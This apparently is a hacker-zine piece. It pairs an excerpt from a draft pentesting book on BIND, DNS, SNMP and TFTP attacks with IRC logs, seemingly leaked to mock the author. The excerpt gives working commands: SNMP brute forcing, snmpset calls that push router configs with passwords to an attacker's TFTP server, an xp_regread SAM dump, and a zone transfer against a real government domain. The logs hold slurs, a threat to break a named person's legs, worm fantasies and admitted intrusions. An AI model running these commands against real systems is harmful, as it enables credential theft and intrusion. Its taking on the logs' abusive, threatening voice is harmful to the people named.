- 8.3.3 libresolv overflow, affecting BIND 4.9.2 - 4.9.10 OpenSSL overflow, affecting BIND 9.1.0 and 9.2.x if built with SSL support libbind overflow, affecting all versions of the stub resolver library from BIND 4 prior to 4.9.9, BIND 8 prior to 8.2.6 and 8.3.0 - 8.3.2, and BIND 9.2.0 (also 9.2.1 if compiled with -enable-libbind) TSIG overflow, affecting BIND 8.2, 8.2.1, 8.2.2 patch levels 1 - 7 and all 8.2.3 beta releases NslookupComplain() bug, affecting BIND 4.9.3, 4.9.4, 4.9.5, 4.9.5 patch level 1, 4.9.6 and 4.9.7 NXT record overflow bug, affecting BIND 8.2, 8.2 patch level 1 and 8.2.1 Remote Denial of Service (DoS) Vulnerabilities in BIND Internal consistency check vulnerability, affecting all BIND 9 versions prior to 9.2.1 ZXFR vulnerability, affecting BIND 8.2.2 and patch levels 1 - 6 sigdiv0 vulnerability, affecting BIND 8.2, 8.2.1 and 8.2.2 patch levels 1 - 5 SRV record bug, affecting BIND 8.2, 8.2.1 and 8.2.2 patch levels 1 - 6 SO_LINGER timeout bug, affecting BIND 8.1, 8.1.1, 8.1.2, 8.2 and 8.2.1 FDMAX vulnerability, affecting BIND 8.1, 8.1.1, 8.1.2, 8.2 and 8.2 patch level 1 SIG record bug, affecting BIND 4.9.5, 4.9.5 patch level 1, 4.9.6, 8.1, 8.1.1, 8.2, 8.2 patch level 1 and 8.2.1 MAXDNAME bug, affecting BIND 4.9.5, 4.9.5 patch level 1, 4.9.6, 4.9.7, 4.9.8, 8.1, 8.1.1, 8.1.2, 8.2, 8.2 patch level 1, 8.2.1, 8.2.2 and 8.2.2 patch level 1 Exploit scripts for some of these vulnerabilities are publicly available from archive sites such as Packet Storm (www.packetstormsecurity.org). Various public tools to assess and exploit remote code execution bugs have been harvested and can be found at www.trustmatta.com/tools/bind/. Microsoft DNS Service Vulnerabilities Windows 2000 in particular ships with built-in DNS services running. As the Windows platform moves towards a native Active Directory model, historic naming services such as WINS are being superceded by DNS. At the time of writing, there is no easy way of listing current Windows 2000 Server DNS vulnerabilities. Due to the way that DNS is built into the core operating system, you must currently trawl through an abundance of vulnerabilities on the Microsoft Technet Security site (www.microsoft.com/technet/security) before coming across specific DNS server issues. A Google web search however, will often spread light over recent problems. DNS Information Leaks Until recently, Checkpoint Firewall-1 shipped with a DNS allow any to any rule within its default policy. Many other firewalls also suffer from this oversight, and so it is often possible to access DNS services running on internal systems that really shouldn't be providing name service to the Internet. During a penetration test I undertook in 1998 against a multinational corporation, I was able to find that many internal network devices used a large class-a IP space (using IP addresses gleaned through other information leak vulnerabilities in SMTP and HTTP servers in particular). After initial port scanning, I found a handful of accessible DNS servers, which in turn seemed to be connected to the internal network. I was able to enumerate internal hosts and networks through one name server in particular, allowing me to build a detailed map of the internal network space. It is sometimes possible to connect directly to DNS servers on peripheral network boundaries (using UDP port 53), and issue requests relating to internal IP addresses, host names and networks, as shown in figure xx below. Figure xx: Using nslookup to map internal IP addresses # nslookup > set querytype=any > server 144.51.5.2 Default server: 144.51.5.2 Address: 144.51.5.2#53 > 192.168.1.23 ;; connection timed out; no servers could be reached > 192.168.1.24 ;; connection timed out; no servers could be reached > 192.168.1.25 Server: 144.51.5.2 Address: 144.51.5.2#53 23.1.168.192.in-addr.arpa name = exchange.internal- net.local. An automated reverse DNS sweep tool such as ghba can even be modified to query a specific name server for internal network information, this can also be achieved without modifying source code by setting your /etc/resolv.conf file to point at the target name server instead of your local DNS servers. SNMP The Simple Network Management Protocol service listens on UDP port 161. SNMP is often found running on network infrastructure devices such as managed switches, routers and other appliances. Increasingly, SNMP can be found running on Unix-based and Windows servers for central network management purposes. SNMP authentication is very simple and is sent across networks in plaintext. SNMP MIB (Management Information Base) data can be retrieved from a device by specifying the correct read community string, and SNMP MIB data can be written to a device using the correct write community string. MIB databases contain ASCII listings of OID (Object Identifier) values, such as routing table information, network statistics, details of network interfaces, and other information. Accessing a router MIB is useful when performing further network reconnaissance and mapping. When a remote attacker is faced with an SNMP service, he has two options: Brute force SNMP community strings to access and manipulate OID values Send malformed data to a vulnerable SNMP service, causing a buffer overflow resulting in either a service crash or arbitrary code being executed on the host or device Two useful tools that are used by attackers and security consultants alike for brute forcing SNMP community strings and accessing MIB entries are ADMsnmp and snmpwalk. ADMsnmp The ADMsnmp tool is available from the ADM group home page at adm.freelsd.net/ADM/. The utility is an effective command-line community string brute force utility, and will run under most Unix-like platforms, including Linux and FreeBSD. Figure xx below shows the ADMsnmp tool in use against a Cisco router at 192.168.0.1 to find that the community string private has write access. Figure xx: Using ADMsnmp to brute force valid community strings # ADMsnmp 192.168.0.1 ADMsnmp vbeta 0.1 (c) The ADM crew ftp://ADM.isp.at/ADM/ greets: !ADM, el8.org, ansia >>>>>>>>>>> get req name=root id = 2 >>>>>>>>>>> >>>>>>>>>>> get req name=public id = 5 >>>>>>>>>>> >>>>>>>>>>> get req name=private id = 8 >>>>>>>>>>> >>>>>>>>>>> get req name=write id = 11 >>>>>>>>>>> <<<<<<<<<<< recv snmpd paket id = 9 name = private ret =0 <<<<<<<<<< >>>>>>>>>>>> send setrequest id = 9 name = private >>>>>>>> >>>>>>>>>>> get req name=admin id = 14 >>>>>>>>>>> <<<<<<<<<<< recv snmpd paket id = 10 name = private ret =0 <<<<<<<<<< >>>>>>>>>>> get req name=proxy id = 17 >>>>>>>>>>> <<<<<<<<<<< recv snmpd paket id = 140 name = private ret =0 <<<<<<<<<< >>>>>>>>>>> get req name=ascend id = 20 >>>>>>>>>>> <<<<<<<<<<< recv snmpd paket id = 140 name = private ret =0 <<<<<<<<<< >>>>>>>>>>> get req name=cisco id = 23 >>>>>>>>>>> >>>>>>>>>>> get req name=router id = 26 >>>>>>>>>>> >>>>>>>>>>> get req name=shiva id = 29 >>>>>>>>>>> >>>>>>>>>>> get req name=all private id = 32 >>>>>>>>>>> >>>>>>>>>>> get req name= private id = 35 >>>>>>>>>>> >>>>>>>>>>> get req name=access id = 38 >>>>>>>>>>> >>>>>>>>>>> get req name=snmp id = 41 >>>>>>>>>>> snmp check on pipex-gw.trustmatta.com sys.sysName.0:pipex-gw.trustmatta.com name = private write access Snmpwalk The snmpwalk utility is part of the Net-SNMP (previously UCD-SNMP) suite of tools available from net-snmp.sourceforge.net. The Net-SNMP toolkit can be built on both Unix and Windows platforms, and contains other useful utilities including snmpset (used to modify and set specific OID values). Snmpwalk is used with the correct community string to download the entire MIB database from the target device (unless a specific OID value to walk is provided by the user). Figure xx below shows the snmpwalk utility being used to download the MIB database from a Cisco router. The MIB is actually around seven pages in length, so only the first 8 OID values are presented here as an example. Figure xx: Using snmpwalk to access the MIB through SNMP # snmpwalk -c public 192.168.0.1 system.sysDescr.0 = Cisco Internetwork Operating System Software IOS (tm) C2600 Software (C2600-IS-M), Version 12.0(6), RELEASE SOFTWARE (fc1) Copyright (c) 1986-1999 by cisco Systems, Inc. Compiled Wed 11-Aug-99 00:16 by phanguye system.sysObjectID.0 = OID: enterprises.9.1.186 system.sysUpTime.0 = Timeticks: (86128) 0:14:21.28 system.sysContact.0 = system.sysName.0 = pipex-gw.trustmatta.com system.sysLocation.0 = system.sysServices.0 = 78 system.sysORLastChange.0 = Timeticks: (0) 0:00:00.00 Default Community Strings Most routers, switches and wireless access points from Cisco, 3Com, Foundry, D-Link and other companies use public and private as their respective default read and write SNMP community strings. The community string list provided with the ADMsnmp brute force program includes cisco, router, enable, admin, read, write and other obvious values. It is often recommended that when assessing routers or devices belonging to a specific organization, that you tailor your list accordingly (including the company name and other values that may be used in that instance). Compromising Devices Through Reading from SNMP Many Windows NT and 2000 servers run SNMP services, using the community string of public for read access. By walking through the 1.3.6.1.4.1.77.1.2.25 OID within a Windows NT or 2000 server, we can enumerate user names of active accounts on the target host 192.168.0.251: # snmpwalk -c public 192.168.102.251 .1.3.6.1.4.1.77.1.2.25 enterprises.77.1.2.25.1.1.8.119.105.114.101.108.101.115.115 = "Chris" enterprises.77.1.2.25.1.1.12.73.85.83.82.95.67.65.82.84.77.65.7 8 = "IUSR_CARTMAN" enterprises.77.1.2.25.1.1.12.73.87.65.77.95.67.65.82.84.77.65.7 8 = "IWAM_CARTMAN" enterprises.77.1.2.25.1.1.13.65.100.109.105.110.105.115.116.114 .97.116.111.114 = "Administrator" enterprises.77.1.2.25.1.1.14.84.115.73.110.116.101.114.110.101. 116.85.115.101.114 = "TsInternetUser" enterprises.77.1.2.25.1.1.15.78.101.116.83.104.111.119.83.101.1 14.118.105.99.101.115 = "NetShowServices" In the above example, the usernames Chris and Administrator are identified, along with the built-in Windows IUSR_hostname, IWAM_hostname, TsInternetUser and NetShowServices users. Various wireless access points and other hardware appliances have been known to contain passwords and details of writable community strings within the accessible MIB. It is highly recommended that for each MIB downloaded from a device over SNMP, each OID value should be checked by hand to ensure that any sensitive information is gleaned. Compromising Devices Through Writing to SNMP If you have compromised the write community string of a Cisco IOS or Ascend branded device, a useful attack to gain direct access is to first set up a TFTP server on an accessible Internet host, and then modify key OID values on the target device over SNMP using snmpset so that the device configuration file (containing direct access passwords under Cisco IOS in particular) can be uploaded to us through TFTP. Examples of this attack against Cisco IOS and Ascend network devices are shown in figures xx and xx below. Figure xx: Writing Cisco IOS OID values to upload the devices configuration file to a TFTP server listening at 192.168.0.50 # snmpset -r 3 -t 3 192.168.0.1 private .1.3.6.1.4.1.9.2.1.55.192.168.0.50 s "cisco-config" Figure xx: Writing Ascend OID values to upload the devices configuration file to a TFTP server listening at 192.168.0.50 # snmpset -r 3 -t 3 192.168.0.254 private .1.3.6.1.4.1.529.9.5.3.0 a "192.168.0.50" # snmpset -r 3 -t 3 192.168.0.254 private .1.3.6.1.4.1.529.9.5.4.0 s "ascend-config" In order for this attack to work, we must install and configure an accessible TFTP server for the appliance to upload its configuration file to. This can either be achieved from a Unix-based platform by modifying the /etc/inetd.conf file to run tftpd from inetd, or using a Windows TFTP server, such as the Cisco TFTP Server, available from www.cisco.com/pcgi- bin/tablebuild.pl/tftp. One key point to remember when performing this exploit is to ensure your TFTP server is writeable so that the device can upload its configuration file. SNMP running on hardware appliances in particular can be imaginatively abused by writing to a plethora of different OID values, from modification of routing tables, to uploading new firmware and configuration files. It is often best to test SNMP attacks in a lab environment before performing them in live networks, as crashing routers, switches and other critical infrastructure devices is often undesirable. Compromising Devices Through Overflowing SNMP In 2001, a series of SNMP overflows were released for most operating platforms, including Windows and Unix-based systems. TFTP The Trivial File Transfer Protocol service listens on UDP port 69, and is often found running on network infrastructure devices including managed switches and routers. TFTP is most used by network administrators for the purposes of configuration file and firmware upload and download when installing and configuring devices. Cisco 1600 series router proof of concept TFTP exploit www.securiteam.com/exploits/5KP0O0A81K.html DHCP Dynamic Host Configuration Protocol (known as either BOOTP in Unix environments, or DHCP in Windows environments) allows diskless workstations to retrieve network and configuration details from the local network on boot. The service itself listens on UDP port 67, with UDP port 68 being used by clients for the receipt of network configuration details. Rwhod Udp 513 Who, rwho? Port 137 netbios-ns NetBIOS name service (UDP) firewalls: Firewall administrators will frequently see large numbers of incoming packets to port 137. This is due to the behavior of Windows servers that use NetBIOS (as well as DNS) to resolve IP addresses to names using the "gethostbyaddr()" function. As users behind the firewalls surf Windows-based web sites, those servers will frequently respond with NetBIOS lookups. Port 138 netbios-dgm (UDP) NetBIOS datagram (UDP) Used by Windows (and services on UNIX like SAMBA). The main danger on the Internet is that by crafting special messages sent to this port, a hacker can convince Windows that their machine is "local", and can therefore bypass some of Microsoft's security settings that differentiate between "local" and "internet" zones. --[3. Assorted IRC Logs - A Journey into My Psyche This is for you guys that weren't in some of the channels I hang out in. As you can see, I anounced my book quite some time ago ;) [00:07:27] i'm writing a book for o'reilly about pentesting [00:07:31] it'll be out in a couple of months [00:07:36] they paid me a fat advance [00:07:38] nice [00:07:44] all i gotta do now is finish it [00:07:53] lol.. yeah.. thats always the problem [00:08:04] yeah well i wrote 70,000 words already [00:08:12] i got another 10,000 or so to go [00:08:22] writing about msrpc security atm [00:08:29] enumerating users through the samr interface [00:08:30] alsortz [00:08:36] msrpc is bonkers [00:08:41] no-one should run that shit on the internet [00:08:44] lol.. yup... sure is [00:08:46] its full of bugs [00:08:58] i think they're called 'features' [00:09:02] ha [00:09:13] theres a fundemental flaw in netbios-dgm [00:09:18] that microsoft refuse to patch [00:09:27] because it would mean re-writing half their netbios code [00:09:38] who the fuck wants netbios anyway? [00:09:44] companies [00:09:48] with big internal networks [00:09:48] :/ [00:09:57] thats ok tho [00:09:59] oh yeah... only half the world! [00:10:01] keeps people like me in a job [19:58:53] do you guys have an oreilly bookshelf [19:59:58] yo yo [20:00:03] do you guys have an oreilly bookshelf [20:00:05] :/ [20:00:12] im writing a book for oreilly [20:00:17] it gets published in november [20:00:23] which book ? [20:00:29] network security assessment [20:00:43] its about professional pen-testing [20:00:48] internet-based [20:00:50] got any samples? . [20:01:03] yeah that would be cool to check out [20:01:22] b-r00t nah itz under technical review [20:01:31] i got to pick 3 of my 7 technical reviewers [20:01:39] so picked john mcdonald, ben laurie and david litchfield [20:01:43] its going to be a dark book [20:02:07] who is the target of the book [20:02:21] like technical systems / network administrators [20:02:24] and it security teams [20:02:53] will you give real world examples of the starting phase to the end phase, dealing with correct ways to write contracts [20:02:54] and such [20:03:03] bro [20:03:07] its a dark book [20:03:11] whats ur email addr [20:03:16] i'll mail u a pdf of chapter 4 [20:03:19] the darkest chapter so far [20:03:20] ;] [20:03:21] yu got mine! [20:03:30] i just msged you mine [20:03:33] wrd [20:03:36] i'll hit u up holmez [20:03:36] thx man [20:03:38] drop me a line back [20:03:43] with some comments [20:04:12] if yu share yer shit on here ...most co0l ppl will give yu honest critz... [20:04:16] have you seen that open soure pen test methodology project ? [20:04:22] yeah its shit [20:04:27] peter herzog is a fucking punk [20:04:32] heh [20:04:35] my book is based on cesg check [20:04:37] and nsa iam [20:04:45] the proper testing methodologies [20:04:58] are you check team leader ? [20:05:48] nope [20:06:02] our company doesnt subscribe to check [20:06:05] 7k/year [20:06:16] yo kraft ru from the uk [20:06:19] what do u do [20:06:40] yup [20:06:53] pen test, consultant etc [20:07:33] im a builder .. heh [20:07:56] br00t@blueyonder.co.uk [20:08:01] I'm a mechanic [20:09:27] ok mail sent [20:09:32] chapter 4 is all about scanning [20:09:39] the later chapters drill down into services [20:09:46] web, ftp, sql, bla blah blaha [20:10:29] this sounds goos dude ... [20:10:46] if yu want to host it here ...ill give yu a slot! [20:10:57] s/goos/good/ ..soz [20:11:19] bro [20:11:25] its being published by oreilly [20:11:26] in november [20:11:28] u klutz [20:11:29] ;] [20:11:38] oh right yeah sorry ... the big time ..wo0two0t! [20:11:42] exactly [20:11:44] teh big time! [20:11:53] you are going to have major bling [20:12:01] get your teeth all iced [20:12:10] yeah well i got my advance last week [20:12:15] 5k [20:12:18] not bad [20:12:25] how long did it take to write [20:12:26] ? [20:12:30] yeah considering most of the book is written [20:12:34] 3 years so far on and off [20:12:39] probably 6 months [20:12:43] of determined effort [20:12:44] ;] [20:12:48] nice [20:12:56] hit me up with some feedback [20:13:08] and i might send over some other chapters [20:13:13] my web assessment chapter is dark [10:38:34] lemme paste the chapter list.. [10:38:57] Chapter 1, Network Security Assessment, introduces and discusses the rationale behind network security assessment and the fact that assurance of security is a process and not simply a product. [10:38:57] Chapter 2, The Tools Required, covers the various Unix-based operating platforms and tool kits that determined attackers and network security professionals can be found using. [10:38:57] Chapter 3, Internet Host & Network Enumeration, logically walks through the Internet-based options that a potential attacker has to map your network from open web searches through to DNS sweeping and querying of authoritative name servers. [10:38:57] Chapter 4, IP Network Scanning, discusses all known IP network scanning techniques and their relevant application, also listing tools and systems that support such scanning types. IDS evasion and low-level packet analysis techniques are also covered. [10:38:57] Chapter 5, Assessing Remote Information Services, defines the techniques and tools used to execute information leak attacks against services such as LDAP, auth, finger and DNS. Some process manipulation attacks are discussed here where appropriate. [10:38:57] Chapter 6, Assessing Web Services, comprehensively covers the assessment of web services including IIS, Apache, OpenSSL and other components such as Frontpage Extensions and Outlook Web Access. Risk mitigation strategies are also detailed, including use of egress network filtering and web service configuration. [10:38:58] k [10:39:18] then 7 - 12 are all about specific services, rpc, windows services, etc. [10:39:25] 13 is about application security [10:39:47] 14 is about example assessment methodologies (against win2k web server, linux mail server and cisco ios router) [10:39:55] and then its onto the appendices Sometimes my friends and I play this game called, "Think Like a Hacker," where we try to imagine what we would do if we weren't some of England's best paid and well established ethical hackers :) [19:52:47] there are plenty more bugs in rpc [19:52:50] someone should find one [19:52:55] and write a new worm [19:53:00] i.e. not publicize it [19:53:03] if i did that [19:53:07] i'd write the most darkside worm [19:53:10] that just spread [19:53:16] and after 48 hours rm'd the boxes [22:20:29] whats new in nmap [22:20:33] i need to update my book chapter [22:24:55] did matta have a stand at infosec ? [22:25:22] nah we never do [22:25:28] its too expensive See the comments on TESO below :) [15:05:36] i talk about telnetfp in my book [15:05:44] its the best thing for fingerprinting telnet services [16:43:40] i have a digital camcorder [16:43:49] i cAN MAKE MOVIES [16:45:52] !!!!!!!!!!!!!!!11 Hmm... maybe I can send the techtv editors a last-minute submission for that hacking special they did on phobos/cold-fire/cjunkie. [23:38:54] ha [23:39:01] i have 7350buttseckz [23:39:09] teso are fucking retarded anyhow [23:39:10] f teso NOTE: teso made the hacking part of this book possible. [23:45:46] f attrition [23:45:51] brian martin is a punk [23:45:53] if i ever meet him [23:45:58] im gonna remix him [23:46:20] he is a stupid cunt [23:46:27] honestly tho [23:46:32] i would have no regrets [23:46:36] in breaking his legs [23:46:43] i would do jail time for that [23:47:02] fucking punk NOTE: Without the attrition.org mirrors of my defacements provided in hyperlink format on my resume, I might still be unemployed today! [23:50:46] im writing a book for oreilly [23:50:48] about pentesting [23:50:55] oh yah ? nice. [23:50:58] good money in that ? [23:50:59] it'll be published in january.. [23:51:03] yeah well 8k usd advance [23:51:08] and 10% royalties [23:51:13] first book ? [23:51:17] yep [23:51:21] congrats [23:51:27] yeah well it took me over 2 years [23:51:36] to get oreilly to agree to acquire me [23:51:37] it's a phone book huh ? [23:51:38] as an author [23:51:45] nop this is the thing [23:51:54] when its published it'll be 280-300 pages [23:51:58] hacking exposed is like 800 pages [23:52:00] of shit [23:52:02] yep they all are [23:52:09] all get pirated now to [23:52:17] john mcdonald, david litchfield, ben laurie [23:52:20] and a few other ppl [23:52:23] are doing my technical review [23:52:26] they contributed to it ? [23:52:30] i got to pick my own tech reviewers [23:52:30] ;] [23:52:33] nice [23:52:49] yeah so thats going to make it pretty lockdown [23:52:52] in terms of info [23:53:39] hacker cracker [23:53:43] yah yah [23:53:43] by that ejovi guy [23:53:51] joej__ [23:53:53] or something [23:53:56] yah [23:54:06] yeah f him [23:54:10] all those american cunts [00:05:40] are you the so1o those phc guys hate ? [00:06:47] yeah [00:06:49] f phc [00:06:51] they are fake as fuck [00:06:55] i thought i reconized the nick [00:06:58] didn't know from where. [00:06:58] i used to be on phc [00:07:03] when gayh1tler ran it [00:07:07] then he left [00:07:14] that's the guy that runs the mailinglist no ? [00:07:17] and all these new ppl started jumping up [00:07:21] like jimjones [00:07:22] all these people and grps are confusing as shit [00:07:24] and halfdead [00:07:29] = fake phc [00:07:31] he's a ass [00:07:35] yeah 4rea [00:07:36] l [00:07:37] thatz about it [00:07:44] i've seen tons of logs with him. does nothing but insult people [00:07:50] exactly [00:07:55] but yeah [00:07:56] itz me [00:08:00] the imfam0uz [00:08:00] talk about how he wrote dos virii in nineteen fucking eight two or some shit [00:08:29] the funny thing is when i go into meetings [00:08:34] with sec ppl from banks or whatnot [00:08:39] 'werent u that so1o guy' [00:08:42] 'from back in the day' [00:08:46] hahaahaaaaaaaaaaa [00:08:46] cunts [00:08:59] it doesn't hold you back ? lose any jobs because of it ? [00:09:15] nah well this is the thing [00:09:20] we lost a 300k pentesting deal because of it [00:09:33] because of attrition.org in particular [00:09:36] but other than that [00:09:39] everythings cool [00:09:43] a lot of our clients think its neat [00:09:49] that i kno what im talking about [00:09:54] and we have a lot of big clients [00:10:04] there's that kind of money in that ? [00:10:09] merrill lynch, barclays, american express [00:10:10] yeah [00:10:14] big dollar in proper pentesting [00:10:19] like framework agreements Thanks for looking past our disagreements in the past and letting me publish this article in your wonderful magazine, PHC! [00:12:14] so attrition guys ratted you out for defacements ? [00:12:23] yeah basically [00:12:30] and linked me to antionline [00:12:33] all sorts of shit [00:12:40] they were real cozy with pigs eh ? [00:12:49] eww antionline ? [00:13:21] yeah [00:13:33] back in the day i was investigating using antionline for marketing space [00:13:34] you hacked it right ? [00:13:36] like banners and whatnot [00:13:39] yeah well i hacked it too [00:13:41] in the end [00:14:37] when my book drops everything will get remixed [00:15:36] yeah embrey well i figured if i wrote a book, i wouldnt have trouble getting a job ever again [00:17:11] mister so1o your old huh ? [00:17:14] 23 [00:17:20] oh ok [00:17:31] left school at 17 [00:17:33] fuck that shit [00:17:34] get a job [00:17:41] i worked at EDS for like 6 weeks [00:17:41] some www had you listed as 38 hehe [00:17:44] and got fired [00:17:47] for winnuking the fuck [00:17:50] peroit old company [00:17:55] out of the people i didnt like [00:17:56] :/ [00:18:10] "DAMNIT MY MACHINE HAZ CRASHED AGAIN!" [00:18:16] "MUST BE A HARDWARE PROBLEM!" [00:18:18] haaaaaaaa [00:18:20] fucking cunts [00:24:16] so you work for barclays now ? i heard something about their atms' this week [00:24:23] nah i dont work for barclays [00:24:26] i work for matta [00:24:29] matta is my company [00:24:37] and in turn they work for barclays... [00:24:42] there are only 5 of us [00:24:44] hmm [00:24:45] yeah exactly [00:28:56] i like el8 magazine [14:24:54] has anyone seen phrack 62 [14:24:55] the fake one [14:25:00] thats a lot like ~el8 magazine [14:25:19] no.. haven't read it ... yer book or phrack that is... can you /msg me the the link and i'll get it done this evening... [14:25:35] you mentioned a SQL section ... [14:25:47] yeah [14:25:49] exactly [14:26:23] xp_regread [14:26:23] The xp_regread procedure allows us to dump registry keys from the database server. In particular this is useful to glean encrypted password strings for software such as VNC, or the Windows SAM database (if SYSKEY encryption is not in use). To dump the SAM from the registry, we would issue the following command: [14:26:23] EXEC xp_regread HKLM,'SECURITY\SAM\Domains\Account','c:\temp\out.txt' [14:26:25] !!!!!!!!!!1111 [14:26:56] linsql can do that too.. well, the non-public version ;) [14:27:04] linsqqqqqqqlllllll [14:27:09] bro u gotta hook it up [14:27:15] so ican put it in my oreilly book [14:27:19] and mAKE U FAM0UZ [14:27:44] no thanks ;) i remember that kind of fame! [14:28:01] ha [14:28:05] every1 wantz to be fam0uz [14:28:06] me me me [14:28:09] make me a star! [15:10:12] idefense are funny [15:10:16] i want to work for them someday [15:10:32] i think they'll go out of business tho [15:10:34] so1o: no more reads ? [15:10:35] by the end of the day [15:10:37] year [15:10:43] giles not today bro i'm locking down this chapter [15:10:46] on windows network services [15:10:53] 135, 137, 138, 139, 445 [15:10:59] laying it down straight [15:11:10] i would be curoius on your section dealing with linux and nix based security [15:11:12] like did u kno u can brute force passwords of users in the administrators group [15:11:20] through the wmi interface accessible via. port 135 [15:11:29] ? [15:11:37] cool, i look forward to reading about that [15:11:48] and then, when you've brute forced the pass [15:11:51] u can execute commands [15:11:54] psexec [15:11:57] yeah [15:11:58] we could have a daily hack classs for each chapter .. [15:11:59] through tcp/135 [15:12:06] lord whats psexec [11:42:45] the book is the bane of my life [11:42:56] will make good money do0d ..will be worth it . [11:43:06] str8 up [11:43:33] yeah well thats the plan [11:43:41] my hidden agenda is to put foundstone out of business J/k!!!!!!!!!!!!!!!!!! ;) 12:09:43] hm [12:09:49] i might save that for my second book [12:09:55] which is about internal security [12:10:01] milk it dude! [12:10:11] ;] [12:10:16] well the whole point with this one [12:10:20] is that its under 300 pages [12:10:25] of remote stuff [12:10:35] if i start talking about local stuff [12:10:39] it will turn out being hacking exposed [12:10:41] all over AGAIN [16:16:55] i cant wait until my book is published and the matta business collects our outstanding invoices in oct/nov [16:17:02] then i might be able to upgrade my car [16:17:08] i drive a 1.0 vw polo atm.. Thanks PHC, for sending me 3APA3A's wire tranfer #! [23:42:54] my bank account is in positive territory [23:42:58] for the first time in 2 years [23:42:59] easily [23:43:15] thats always a good thing .. [23:43:16] only because i consolidated my overdraft with one of my natwest loans [23:43:24] med~ ..yer late been out on it ? [23:43:24] and oreilly wired me some more of my advance [16:31:42] i'm writing a book for o'reilly about security [23:19:41] K-SP1FF [23:19:44] SP1FFTASTIC [23:19:45] !!!!1 [23:19:56] im writing a book about hacking [23:20:03] o'reilly are going to publish it [23:20:06] and 12308218214082480 hackers [23:20:08] will be BORN [23:20:09] !!!1 [23:20:24] HACKING FOR CUNTS [23:20:26] ! [23:20:28] hahah [23:20:29] no [23:20:37] "network security assessment" [23:20:47] hacking for cunts would be a good name tho [23:23:42] i gotta keep my book lean tho bro [23:23:43] no cd [23:23:45] paperback [23:23:49] 250 pages or so [23:23:53] to keep the costs down [23:23:59] so we can regulate hacking exposed [23:24:05] some sort of 80 bucks or something [23:24:10] and my book will be 25 INFORMATION MUST BE FREED! [23:25:29] ha [23:25:37] i dont care if people e-book and pir8 it [23:25:49] infact i might e-book it myself [23:25:56] with all the parts the publisher want to take out [23:26:01] well they dont atm [23:26:11] but if they do get me to take out my CIA examples [23:26:12] or whatnot [23:26:17] i'll put out an underground e-book [23:26:22] like the uncensored version INFORMATION MUST BE FREED! [23:25:56] with all the parts the publisher want to take out [23:26:01] well they dont atm [23:26:11] but if they do get me to take out my CIA examples [23:26:12] or whatnot [23:26:17] i'll put out an underground e-book [23:26:22] like the uncensored version [23:26:37] oh in chapter 3 [23:26:46] i explain how to map the cia's network [23:26:48] internally and shit [23:27:01] using whois, dns, sending mail to blahblah@ucia.gov [23:27:02] etc. [23:27:08] u can zone xfer the cia [23:27:25] dig @auth100.ns.uu.net ucia.gov axfr [23:27:32] its neat0 [23:28:05] i wrote a white paper about it [23:28:07] for matta ages back [23:28:11] www.trustmatta.com/downloads/ [23:28:16] - internet-based counterintelligence [23:28:25] oh and www.trustmatta.com/downloads/cia-map.jpg [23:28:51] ;; connect: Connection timed out [23:28:51] ; <<>> DiG 2.2 <<>> @auth100.ns.uu.net ucia.gov axfr [23:28:51] ; (1 server found) [23:28:51] ;; FROM: cyberforce to SERVER: 198.6.1.202 [23:28:51] ;; WHEN: Tue Sep 30 00:55:32 2003 [23:28:58] hm [23:29:00] timed out [23:29:01] http://www.trustmatta.com/services/docs/cia-map.jpg [23:29:02] even [23:30:02] ok [23:39:46] i got busted back in 1999 [23:39:54] for hacking some *.spawar.navy.mil boxes [23:39:59] and trying to break into ncsc.mil [23:40:02] from there [00:00:58] so im writing a book for oreilly [00:00:59] they <3 me [00:01:05] they keep wiring me money [00:01:10] "i need more dollar" [00:01:12] "for my advance" [00:01:19] "plz send it ok thx!" [15:44:08] who the fuck are these dtors.net ppl [15:44:11] they look like students [15:44:16] fucking teenage students [15:46:06] anyhow dtors.net [15:46:12] who are those dropkickz [15:46:35] one of them coded a sploit for ssl :| apartently works [15:46:37] webcamTASTIC [15:46:48] wrd [15:46:52] i dont see no working expl [15:46:55] maybe someone can hook me up [11:02:59] i'm writing a book for oreilly [11:03:02] if thatz what u mean [11:03:20] about security? [11:03:27] 'network security assessment' [11:13:09] my book is going to fuck the industry up [11:13:15] everything will be owned [11:13:29] the follow-up book will be the killer tho [11:13:33] about internal network security [11:13:45] and what u can do if you have access to the wire n shit [11:13:56] that wont be an oreilly book [11:14:02] im going to release that anonymously [11:14:12] through some publisher like no starch books or something [13:51:42] just mention the whole o'reilly book thing [13:51:49] and the fact that i will lock them down [13:51:54] like nobody ever has [13:51:58] i will rock them [16:31:09] it'll be out in january bro [16:31:25] the first 7 chapters (half the book) has been copy edited and is ready to print [16:31:37] i thought you were pushing for NOV [16:31:42] as a relesase date [16:31:44] um INFORMATION MUST BE FREED! [16:43:36] man i fucking hate oracle [16:43:43] i hate proprietary shit [16:43:44] :/ [16:43:59] im writing about hacking the tns listener [16:44:02] for my oreilly book [16:44:14] and the more i research oracle [16:44:18] the more complex it becomes [13:11:54] my book will fuck shit upo [13:11:56] !!!!111 [13:11:59] df did u kno [13:12:02] i am writing a book for oreilly [13:12:04] about hacking [15:25:34] my book is too darkside [15:25:36] to pdf [13:14:56] yeah i kno [13:15:03] dont want to make the book a big howto tho [13:16:40] i'll just put it in the 2nd edition due out in 2005 [13:18:45] so1o, you wrote a book? [13:18:48] yeah for oreilly [13:18:51] yo [13:18:51] on pentesting [13:18:58] so1o, what was title? [13:19:10] network security assessment [13:19:12] out in january 2004 [13:19:21] you wrote the whole thing? [13:19:31] yeah [12:11:53] anyone got access to a solaris 9 box and nmap 3.45 or 3.48 [12:11:59] i need an rpc scan result [12:12:04] to put in teh book [15:26:29] one day my book will be finished [15:26:31] and it will be good [15:26:33] until then [15:26:34] itz not [15:33:01] one day i might work at idefense [15:33:05] if they pay me [15:47:23] mine are hardcore tho [15:47:36] john mcdonald, ben laurie, jeff fay [15:47:40] and i tried to get david litchfield [15:47:44] but he didnt return emailz Watch out for these advanced topics, coming in the sequel! [11:50:11] if i am talking about memory layout in intel x86 [11:50:12] it goes.. [11:50:19] text [11:50:19] data [11:50:21] bss [11:50:22] heap [11:50:29] stack [11:50:40] 0xffffffff [11:50:41] right [11:50:52] i mean its sparc which has the heap and stack upside down right? [11:51:34] [text][data][<-- stack] [11:51:40] [data] [ bss ][ heap -->] [11:51:43] thats the layout [11:51:44] :) [11:52:32] hm [11:52:35] now you've confused me [11:52:49] i thought it was [11:52:52] 0x00000000 [11:52:53] text [11:52:54] data [11:52:55] bss [11:52:56] heap [11:52:57] stack [11:52:59] 0xffffffff [11:53:11] and the heap/stack grow down/up accordingly [11:53:32] so you're saying its.. [11:53:39] text [11:53:39] data [11:53:40] stack [11:53:41] data [11:53:42] bss [11:53:43] heap [11:53:44] ? 